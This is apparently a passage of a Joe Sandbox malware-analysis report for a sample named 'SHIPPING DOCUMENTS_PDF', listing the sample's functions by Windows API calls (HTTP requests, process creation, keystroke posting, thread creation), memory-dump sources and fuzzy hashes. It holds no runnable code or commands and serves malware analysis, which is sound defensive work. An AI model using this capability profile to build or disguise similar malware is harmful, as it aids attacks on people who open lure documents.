• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: c03344ea1f07c75ce711543bad430eaafe745a24385353480339a5ce08e494f8
• Instruction ID: ef80ba4c2349f00546b82b7861a3d70ca6b43112ac3ea5dcb6d210233b3febc0
• Opcode Fuzzy Hash: c03344ea1f07c75ce711543bad430eaafe745a24385353480339a5ce08e494f8
• Instruction Fuzzy Hash: DC319F75601204ABDB109F98EC94BFE77EAEB56311F5085A9F901D71A0D7B0DD40CB50
APIs
• GetSysColor.USER32(00000008), ref: 00B52231
• SetTextColor.GDI32(?,000000FF), ref: 00B5223B
• SetBkMode.GDI32(?,00000001), ref: 00B52250
• GetStockObject.GDI32(00000005), ref: 00B52258
• GetClientRect.USER32(?), ref: 00B8BDBB
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00B8BDD2
• GetWindowDC.USER32(?), ref: 00B8BDDE
• GetPixel.GDI32(00000000,?,?), ref: 00B8BDED
• ReleaseDC.USER32(?,00000000), ref: 00B8BDFF
• GetSysColor.USER32(00000005), ref: 00B8BE1D
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
• String ID:
• API String ID: 3430376129-0
• Opcode ID: 01cd01664681a00edc0de85a51c803894dfabfeab68690c79daab447bfef0be5
• Instruction ID: 8945631c196d43bb83fe96592d18119992b193d38729a20cf4c256fd207be4d0
• Opcode Fuzzy Hash: 01cd01664681a00edc0de85a51c803894dfabfeab68690c79daab447bfef0be5
• Instruction Fuzzy Hash: 0A215C32506206EFDB216FA4EC58BE9BBA1EB15322F1042A6FA26960F1DB314951DF11
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B5FAA6
                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00B5FB45
                                                                                    • UnregisterHotKey.USER32(?), ref: 00B5FC9C
                                                                                    • DestroyWindow.USER32(?), ref: 00B945D6
                                                                                    • FreeLibrary.KERNEL32(?), ref: 00B9463B
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B94668
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                    • String ID: close all
                                                                                    • API String ID: 469580280-3243417748
                                                                                    • Opcode ID: 69566bc8b4e42e27a2a8bc5070257c88355de994c47272b74cdda93d3f6bb79e
                                                                                    • Instruction ID: c7d8b311f7cfc0b7370d8016466974a411a450a9a78f152c33658022478b1595
                                                                                    • Opcode Fuzzy Hash: 69566bc8b4e42e27a2a8bc5070257c88355de994c47272b74cdda93d3f6bb79e
                                                                                    • Instruction Fuzzy Hash: BDA11370602212CFCB29EB14C9A5B79F7E4EF05711F5542F9E90AAB261DB30AD1ACF50
                                                                                    APIs
                                                                                    • EnumChildWindows.USER32(?,00BAA439), ref: 00BAA377
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ChildEnumWindows
                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                    • API String ID: 3555792229-1603158881
                                                                                    • Opcode ID: e2c1f807580717a533ac62cc256e895f2048550d140a489f4fd58c5c6318e6d6
                                                                                    • Instruction ID: 704a870bc162f1a3e23f78378d77a0c281f4499fb4bf00646a45721f7e5dcbb5
                                                                                    • Opcode Fuzzy Hash: e2c1f807580717a533ac62cc256e895f2048550d140a489f4fd58c5c6318e6d6
                                                                                    • Instruction Fuzzy Hash: CE91A470A08605EACF18EFA0C482BEDFBE4FF16300F548199D859A7191DF316999DBB1
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00B52EAE
                                                                                      • Part of subcall function 00B51DB3: GetClientRect.USER32(?,?), ref: 00B51DDC
                                                                                      • Part of subcall function 00B51DB3: GetWindowRect.USER32(?,?), ref: 00B51E1D
                                                                                      • Part of subcall function 00B51DB3: ScreenToClient.USER32(?,?), ref: 00B51E45
                                                                                    • GetDC.USER32 ref: 00B8CD32
                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B8CD45
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B8CD53
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B8CD68
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00B8CD70
                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B8CDFB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                    • String ID: U
                                                                                    • API String ID: 4009187628-3372436214
                                                                                    • Opcode ID: 4b8a44da3c9e822ba841305f800ae0a05e554599fc9d81db5412a1362b7f290e
                                                                                    • Instruction ID: 2b8883bc735583d9af9a3567b4e49f3482f09d609e2b949d16a0e72916b0bba5
                                                                                    • Opcode Fuzzy Hash: 4b8a44da3c9e822ba841305f800ae0a05e554599fc9d81db5412a1362b7f290e
                                                                                    • Instruction Fuzzy Hash: 6971BC71800205DFCF21AF64C881AAA7FF5FF49321F1482FAED595A2A6D7309845DFA0
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BC1A50
                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BC1A7C
                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BC1ABE
                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BC1AD3
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC1AE0
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00BC1B10
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00BC1B57
                                                                                      • Part of subcall function 00BC2483: GetLastError.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC2498
                                                                                      • Part of subcall function 00BC2483: SetEvent.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC24AD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                    • String ID:
                                                                                    • API String ID: 2603140658-3916222277
                                                                                    • Opcode ID: ca5818c1ad9e72adf5af5915f0183d6ead090905b5d78bb96c29904a4344a4f1
                                                                                    • Instruction ID: c95d11a47bac214aa49b822c75fd5071b4804a138c6d219a26558d816aebb41f
                                                                                    • Opcode Fuzzy Hash: ca5818c1ad9e72adf5af5915f0183d6ead090905b5d78bb96c29904a4344a4f1
                                                                                    • Instruction Fuzzy Hash: 7F419FB1501209BFEB119F54CC85FFA7BACEF09350F00816AFA05AA142EB709E409BA0
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BDF910), ref: 00BC8D28
                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BDF910), ref: 00BC8D5C
                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BC8ED6
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00BC8F00
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                    • String ID:
                                                                                    • API String ID: 560350794-0
                                                                                    • Opcode ID: d1b9f1508401bb9e2732e0bcea904cafa4431250e4c12c3820decdc92a0477a7
                                                                                    • Instruction ID: 1b38135954478dfa89f7dbd7b82b263849e5f77edceac3c78668b0f6e9b6f111
                                                                                    • Opcode Fuzzy Hash: d1b9f1508401bb9e2732e0bcea904cafa4431250e4c12c3820decdc92a0477a7
                                                                                    • Instruction Fuzzy Hash: 3EF12871A00209EFDB14DF94C888EAEB7B9FF45315F10849DF916AB251DB31AE45CBA0
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BCF6B5
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF848
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF86C
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF8AC
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCF8CE
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BCFA4A
                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00BCFA7C
                                                                                    • CloseHandle.KERNEL32(?), ref: 00BCFAAB
                                                                                    • CloseHandle.KERNEL32(?), ref: 00BCFB22
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4090791747-0
                                                                                    • Opcode ID: a7600ce86ae2408366f97ba838d7dbabe5d575ac91e886f9482c81e725d3d96f
                                                                                    • Instruction ID: 5b6a4cd6958ede0fdf0b0847870ab2ea0c6cbd9f7b2918cd2d57d6026b3946ca
                                                                                    • Opcode Fuzzy Hash: a7600ce86ae2408366f97ba838d7dbabe5d575ac91e886f9482c81e725d3d96f
                                                                                    • Instruction Fuzzy Hash: C9E14D31604202DFCB14EF24C891B6ABBE1EF85354F1485EEF8999B2A1DB71DC45CB52
                                                                                    APIs
                                                                                      • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BB3697,?), ref: 00BB468B
                                                                                      • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BB3697,?), ref: 00BB46A4
                                                                                      • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00BB4D40
                                                                                    • _wcscmp.LIBCMT ref: 00BB4D5A
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00BB4D75
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 793581249-0
                                                                                    • Opcode ID: 2fc70f6118180318f4496b6c6c4a104a04378760c9fae0056cefe78a7a1f8834
                                                                                    • Instruction ID: 5eacda1c68ede34dcaa6b873b1120073071bd8e07c42d6fde1bad25a9b5b1fdf
                                                                                    • Opcode Fuzzy Hash: 2fc70f6118180318f4496b6c6c4a104a04378760c9fae0056cefe78a7a1f8834
                                                                                    • Instruction Fuzzy Hash: 325174B20083459BC725DB64D8919EFB3ECEF84351F00496EF589D3152EF74A688C766
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BD86FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: f0f5cc7a9032358d61a7975f424bfb77c6dc823838828bd9039a5f8e4fde4a62
                                                                                    • Instruction ID: 2268fe482964e829e3e0c9f6799d721db4822c5dbeb53d16097b3e8fb9a84706
                                                                                    • Opcode Fuzzy Hash: f0f5cc7a9032358d61a7975f424bfb77c6dc823838828bd9039a5f8e4fde4a62
                                                                                    • Instruction Fuzzy Hash: DF518130501205BEEB209B28CC85FADBBE5EB06722F6041D3F915D63A1EF72E980DB41
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B8C2F7
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B8C319
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B8C331
                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B8C34F
                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B8C370
                                                                                    • DestroyIcon.USER32(00000000), ref: 00B8C37F
                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B8C39C
                                                                                    • DestroyIcon.USER32(?), ref: 00B8C3AB
                                                                                      • Part of subcall function 00BDA4AF: DeleteObject.GDI32(00000000), ref: 00BDA4E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                    • String ID:
                                                                                    • API String ID: 2819616528-0
                                                                                    • Opcode ID: f70285a1e6b681d8f44a2eb4fae5f44709dd68b30996c9a0c15d3ed85913af15
                                                                                    • Instruction ID: cc4ff804aa6763a11e5df7d8bfa93db8d13afac251427719a3d6e61d1ef52248
                                                                                    • Opcode Fuzzy Hash: f70285a1e6b681d8f44a2eb4fae5f44709dd68b30996c9a0c15d3ed85913af15
                                                                                    • Instruction Fuzzy Hash: 98516970A01205EFDB24DF24CC85BAA7BE5FB49311F1085A9F902972E0DB70ED95DB60
                                                                                    APIs
                                                                                      • Part of subcall function 00BAA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BAA84C
                                                                                      • Part of subcall function 00BAA82C: GetCurrentThreadId.KERNEL32 ref: 00BAA853
                                                                                      • Part of subcall function 00BAA82C: AttachThreadInput.USER32(00000000,?,00BA9683,?,00000001), ref: 00BAA85A
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA968E
                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00BA96AB
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00BA96AE
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA96B7
                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00BA96D5
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00BA96D8
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA96E1
                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00BA96F8
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00BA96FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2014098862-0
                                                                                    • Opcode ID: 0f3dca4c9efcd398462dfdf0f92ae47303a167d4061e4de699fe726b1604e95d
                                                                                    • Instruction ID: fd71f6d52f6208bcee904fc237b9b63ec752c25990fb40a936cda6da0804f4d2
                                                                                    • Opcode Fuzzy Hash: 0f3dca4c9efcd398462dfdf0f92ae47303a167d4061e4de699fe726b1604e95d
                                                                                    • Instruction Fuzzy Hash: 5011CEB1914219BEFA106B649C89F7ABB6DEB4D750F100426F355AB0A0DEF25C10DAA4
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00BA853C,00000B00,?,?), ref: 00BA892A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00BA853C,00000B00,?,?), ref: 00BA8931
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BA853C,00000B00,?,?), ref: 00BA8946
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00BA853C,00000B00,?,?), ref: 00BA894E
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00BA853C,00000B00,?,?), ref: 00BA8951
                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00BA853C,00000B00,?,?), ref: 00BA8961
                                                                                    • GetCurrentProcess.KERNEL32(00BA853C,00000000,?,00BA853C,00000B00,?,?), ref: 00BA8969
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00BA853C,00000B00,?,?), ref: 00BA896C
                                                                                    • CreateThread.KERNEL32(00000000,00000000,00BA8992,00000000,00000000,00000000), ref: 00BA8986
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1957940570-0
                                                                                    • Opcode ID: bbc97939b5e4787b1da0ab862a3f040179c28691913f54e28760f869849a6b93
                                                                                    • Instruction ID: 9150b2fd776df510984915bac86dc0567d8fd0f3419fbd26a06be974fae8e102
                                                                                    • Opcode Fuzzy Hash: bbc97939b5e4787b1da0ab862a3f040179c28691913f54e28760f869849a6b93
                                                                                    • Instruction Fuzzy Hash: 8B01BBB5245309FFEB10ABA5DC4DF6B7BACEB89711F408421FA05DB1A1DA709800CB60
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                    • API String ID: 0-572801152
                                                                                    • Opcode ID: 03446b2bc17b220f91e7eb6a0666fe3ab90950697d96c4d06748a588a020a53f
                                                                                    • Instruction ID: ac06626bac59ef6d4b5d4bff63ed29e1398026c5cd538995db3b908c8602549c
                                                                                    • Opcode Fuzzy Hash: 03446b2bc17b220f91e7eb6a0666fe3ab90950697d96c4d06748a588a020a53f
                                                                                    • Instruction Fuzzy Hash: F9C18371A0021AABEF10DF98D888FAEB7F5FB58314F1584ADE915A7280E770DD45CB90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                    • API String ID: 2862541840-625585964
                                                                                    • Opcode ID: 625366b552835ace5070bd8a233e1119dee8337a2a9c3fdd1686f6f476d62008
                                                                                    • Instruction ID: b02c120ad03f297e1af7d3279ccfe29ae0900379f005dea4c28cfb3b233f5ab6
